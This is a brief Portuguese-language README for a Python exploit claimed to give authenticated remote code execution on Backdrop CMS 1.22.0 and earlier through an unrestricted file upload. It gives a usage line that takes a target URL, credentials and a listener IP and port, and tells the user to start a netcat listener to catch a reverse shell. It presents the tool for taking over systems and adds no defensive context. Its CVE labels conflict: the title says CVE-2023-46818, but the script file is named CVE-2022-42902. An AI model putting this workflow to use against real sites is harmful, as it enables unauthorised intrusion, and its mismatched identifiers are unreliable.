
CVE-2023-46818 Exploit Python3 para Backdrop CMS <= 1.22.0 Execução Remota de Comandos Autenticada (RCE)
Este script de exploit em Python tem como alvo um upload de arquivo irrestrito no Backdrop CMS para alcançar uma Execução Remota de Código (RCE).
Versão 1.22.0 e versões anteriores Nota: O Backdrop CMS contesta isso e argumenta que permissões avançadas são necessárias, razão pela qual ainda pode existir em versões acima da 1.22.0. Eu presumo que eles querem dizer que você precisaria ter acesso de administrador primeiro. Ainda assim, é uma vulnerabilidade válida, e definitivamente pode ser explorada para obter controle total do sistema.
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
Importante: Inicie seu listener antes de executar o script:
nc -lvnp <listener_port>
